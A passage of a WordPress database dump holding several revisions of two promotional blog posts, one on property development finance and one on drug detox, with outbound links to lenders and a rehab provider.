-->\n\n<!-- wp:paragraph -->\n<p>When performing a property development, there are things people may have been unaware of when they decided to begin the journey.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unlike how other people may make property development projects seem, deciding to develop properties can come with many risks if the developer has not done their research and does not have the right attitude to be a property developer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While it is possible anyone can become a property developer with the right attitude, you will need more than the correct mindset to succeed in the competitive environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><u>People get into property development to increase their income</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There will always be a need for housing - not just in the UK, but around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the population rises, we will need more homes to accommodate the increasing population - and property development is the&nbsp;<em>perfect</em>&nbsp;way to do that.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are 29 million homes in the UK (https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf), whilst the population of the UK is estimated to be 67 million people (https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Property development is a method to solve the rising number of homeless people across the UK so they do not need to rely upon homeless shelters or sleeping in rough conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, before deciding to get into property management, many things need to be considered during the property development journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Your finance is essential</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Development finance is the most important part of getting your property development going!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many properties do not get built because of inadequate access to receiving development finance. Unlike developers with more income, many first-time buyers may not have the money to fund a property development project on their own so they rely on getting a loan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are unable to get a loan from a traditional bank, there is an increase in alternative providers that specialise in providing funding to property developments. https://www.hunterfinance.co.uk/development-finance/</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Vision</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Every property needs a vision to succeed.</em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Whether you are building a block of flats, a semi-detached home, or a bungalow... your property needs a vision so it can succeed in the property market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Drawing up plans and having a particular idea of how you would like the property to look will show that there was a lot of thought put into the project - and it could be more appealing to potential buyers and renters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Think of your property development as something&nbsp;you&nbsp;are looking at: if you aren\'t interested in how it looks, then other people may think the same way that you do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Your property development finance should be used to ensure the property is up to all of your standards regarding how it looks and all the features.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Construction</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Do you need to hire a team that will undertake the construction process?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Developers rely on their property development finance to cover the costs of the construction process and some property finance lenders provide enough money to cover the construction process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Be sure that you have an outline of what construction process you need to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Don\'t delay your property development journey, with the right property development finance you can begin your journey much quicker than you expected!&nbsp;</p>\n<!-- /wp:paragraph -->','Everything you need to know about developing properties','','inherit','closed','closed','','653-revision-v1','','','2021-08-06 09:12:16','2021-08-06 09:12:16','',653,'https://www.westonspirit.org.uk/?p=654',0,'revision','',0),(655,1,'2021-08-06 09:15:50','2021-08-06 09:15:50','<!-- wp:paragraph -->\n<p><strong>What everyone needs to know before they begin the property development journey!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When performing a property development, there are things people may have been unaware of when they decided to begin the journey.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unlike how other people may make property development projects seem, deciding to develop properties can come with many risks if the developer has not done their research and does not have the right attitude to be a property developer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While it is possible anyone can become a property developer with the right attitude, you will need more than the correct mindset to succeed in the competitive environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><u>People get into property development to increase their income</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There will always be a need for housing - not just in the UK, but around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the population rises, we will need more homes to accommodate the increasing population - and property development is the&nbsp;<em>perfect</em>&nbsp;way to do that.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are 29 million homes in the UK (https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf), whilst the population of the UK is estimated to be 67 million people (https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Property development is a method to solve the rising number of homeless people across the UK so they do not need to rely upon homeless shelters or sleeping in rough conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, before deciding to get into property management, many things need to be considered during the property development journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Your finance is essential</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Development finance is the most important part of getting your property development going!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many properties do not get built because of inadequate access to receiving development finance. Unlike developers with more income, many first-time buyers may not have the money to fund a property development project on their own so they rely on getting a loan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are unable to get a loan from a traditional bank, there is an increase in alternative providers that specialise in providing funding to property developments. https://www.hunterfinance.co.uk/development-finance/</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Vision</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Every property needs a vision to succeed.</em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Whether you are building a block of flats, a semi-detached home, or a bungalow... your property needs a vision so it can succeed in the property market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Drawing up plans and having a particular idea of how you would like the property to look will show that there was a lot of thought put into the project - and it could be more appealing to potential buyers and renters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Think of your property development as something&nbsp;you&nbsp;are looking at: if you aren\'t interested in how it looks, then other people may think the same way that you do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Your property development finance should be used to ensure the property is up to all of your standards regarding how it looks and all the features.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Construction</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Do you need to hire a team that will undertake the construction process?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Developers rely on their property development finance to cover the costs of the construction process and some property finance lenders provide enough money to cover the construction process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Be sure that you have an outline of what construction process you need to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Don\'t delay your property development journey, with the right property development finance you can begin your journey much quicker than you expected!&nbsp;</p>\n<!-- /wp:paragraph -->','Everything you need to know about property development','','inherit','closed','closed','','653-revision-v1','','','2021-08-06 09:15:50','2021-08-06 09:15:50','',653,'https://www.westonspirit.org.uk/?p=655',0,'revision','',0),(656,1,'2021-08-06 09:47:15','2021-08-06 09:47:15','<!-- wp:paragraph -->\n<p><strong>What everyone needs to know before they begin the property development journey!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When performing a property development, there are things people may have been unaware of when they decided to begin the journey.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unlike how other people may make property development projects seem, deciding to develop properties can come with many risks if the developer has not done their research and does not have the right attitude to be a property developer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While it is possible anyone can become a property developer with the right attitude, you will need more than the correct mindset to succeed in the competitive environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><u>People get into property development to increase their income</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There will always be a need for housing - not just in the UK, but around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the population rises, we will need more homes to accommodate the increasing population - and property development is the&nbsp;<em>perfect</em>&nbsp;way to do that.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are 29 million homes in the <a rel=\"noreferrer noopener\" href=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" data-type=\"URL\" data-id=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" target=\"_blank\">UK</a>, whilst the population of the UK is estimated to be <a href=\"http://(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" data-type=\"URL\" data-id=\"(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" target=\"_blank\" rel=\"noreferrer noopener\">67 million people.</a> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Property development is a method to solve the rising number of homeless people across the UK so they do not need to rely upon homeless shelters or sleeping in rough conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, before deciding to get into property management, many things need to be considered during the property development journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Your finance is essential</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Development finance is the most important part of getting your property development going!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many properties do not get built because of inadequate access to receiving development finance. Unlike developers with more income, many first-time buyers may not have the money to fund a property development project on their own so they rely on getting a loan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are unable to get a loan from a traditional bank, there is an <a href=\"https://www.hunterfinance.co.uk/development-finance/\" data-type=\"URL\" data-id=\"https://www.hunterfinance.co.uk/development-finance/\" target=\"_blank\" rel=\"noreferrer noopener\">increase in alternative providers</a> that specialise in providing funding to property developments. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Vision</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Every property needs a vision to succeed.</em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Whether you are building a block of flats, a semi-detached home, or a bungalow... your property needs a vision so it can succeed in the property market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Drawing up plans and having a particular idea of how you would like the property to look will show that there was a lot of thought put into the project - and it could be more appealing to potential buyers and renters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Think of your property development as something&nbsp;you&nbsp;are looking at: if you aren\'t interested in how it looks, then other people may think the same way that you do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Your property development finance should be used to ensure the property is up to all of your standards regarding how it looks and all the features.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Construction</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Do you need to hire a team that will undertake the construction process?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Developers rely on their property development finance to cover the costs of the construction process and some property finance lenders provide enough money to cover the construction process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Be sure that you have an outline of what construction process you need to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Don\'t delay your property development journey, with the right property development finance you can begin your journey much quicker than you expected!&nbsp;</p>\n<!-- /wp:paragraph -->','Everything you need to know about property development','','inherit','closed','closed','','653-revision-v1','','','2021-08-06 09:47:15','2021-08-06 09:47:15','',653,'https://www.westonspirit.org.uk/?p=656',0,'revision','',0),(657,1,'2021-08-06 13:53:06','2021-08-06 13:53:06','<!-- wp:paragraph -->\n<p><strong>What everyone needs to know before they begin the property development journey!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When performing a property development, there are things people may have been unaware of when they decided to begin the journey.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unlike how other people may make property development projects seem, deciding to develop properties can come with many risks if the developer has not done their research and does not have the right attitude to be a property developer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While it is possible anyone can become a property developer with the right attitude, you will need more than the correct mindset to succeed in the competitive environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><u>People get into property development to increase their income</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There will always be a need for housing - not just in the UK, but around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the population rises, we will need more homes to accommodate the increasing population - and property development is the&nbsp;<em>perfect</em>&nbsp;way to do that.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are 29 million homes in the <a rel=\"noreferrer noopener\" href=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" data-type=\"URL\" data-id=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" target=\"_blank\">UK</a>, whilst the population of the UK is estimated to be <a href=\"http://(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" data-type=\"URL\" data-id=\"(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" target=\"_blank\" rel=\"noreferrer noopener\">67 million people.</a> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Property development is a method to solve the rising number of homeless people across the UK so they do not need to rely upon homeless shelters or sleeping in rough conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, before deciding to get into property management, many things need to be considered during the property development journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Your finance is essential</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Development finance is the most important part of getting your property development going!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many properties do not get built because of inadequate access to receiving development finance. Unlike developers with more income, many first-time buyers may not have the money to fund a property development project on their own so they rely on getting a loan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are unable to get a loan from a traditional bank, there is an <a href=\"https://www.hunterfinance.co.uk/development-finance/\" data-type=\"URL\" data-id=\"https://www.hunterfinance.co.uk/development-finance/\" target=\"_blank\" rel=\"noreferrer noopener\">increase in alternative providers</a> that specialise in providing funding to property developments. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Vision</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Every property needs a vision to succeed.</em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Whether you are building a block of flats, a semi-detached home, or a bungalow... your property needs a vision so it can succeed in the property market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Drawing up plans and having a particular idea of how you would like the property to look will show that there was a lot of thought put into the project - and it could be more appealing to potential buyers and renters.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Think of your property development as something&nbsp;you&nbsp;are looking at: if you aren\'t interested in how it looks, then other people may think the same way that you do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Your property development finance should be used to ensure the property is up to all of your standards regarding how it looks and all the features.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Construction</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Do you need to hire a team that will undertake the construction process?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Developers rely on their property development finance to cover the costs of the construction process and some property finance lenders provide enough money to cover the construction process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Be sure that you have an outline of what construction process you need to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Don\'t delay your property development journey, with the right property development finance you can begin your journey much quicker than you expected!&nbsp;</p>\n<!-- /wp:paragraph -->','Everything you need to know about property development','','inherit','closed','closed','','653-revision-v1','','','2021-08-06 13:53:06','2021-08-06 13:53:06','',653,'https://www.westonspirit.org.uk/?p=657',0,'revision','',0),(660,1,'2021-08-19 15:41:42','2021-08-19 15:41:42','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of <a href=\"https://www.healthline.com/nutrition/how-to-detox-your-body\" target=\"_blank\" rel=\"noreferrer noopener\">drugs and/or alcohol from someone\'s system</a>. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct place to detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a rel=\"noopener\" target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Having a detox to get specific toxins out of your body provides multiple benefits to you:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Improves your mental health</li><li>Removes all of the toxins out of your body</li><li>Provides you with the right headspace so you can focus on sobriety</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','publish','open','open','','the-key-things-to-know-about-drug-detoxing','','','2021-09-10 08:43:31','2021-09-10 08:43:31','',0,'https://www.westonspirit.org.uk/?p=660',0,'post','',0),(661,1,'2021-08-19 15:39:56','2021-08-19 15:39:56','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><iframe width=\"560\" height=\"315\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noreferrer noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','Everything you need to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-19 15:39:56','2021-08-19 15:39:56','',660,'https://www.westonspirit.org.uk/?p=661',0,'revision','',0),(662,1,'2021-08-19 15:40:12','2021-08-19 15:40:12','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of drugs and/or alcohol from someone\'s system. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><iframe width=\"560\" height=\"315\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></p>\n<p></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noreferrer noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" 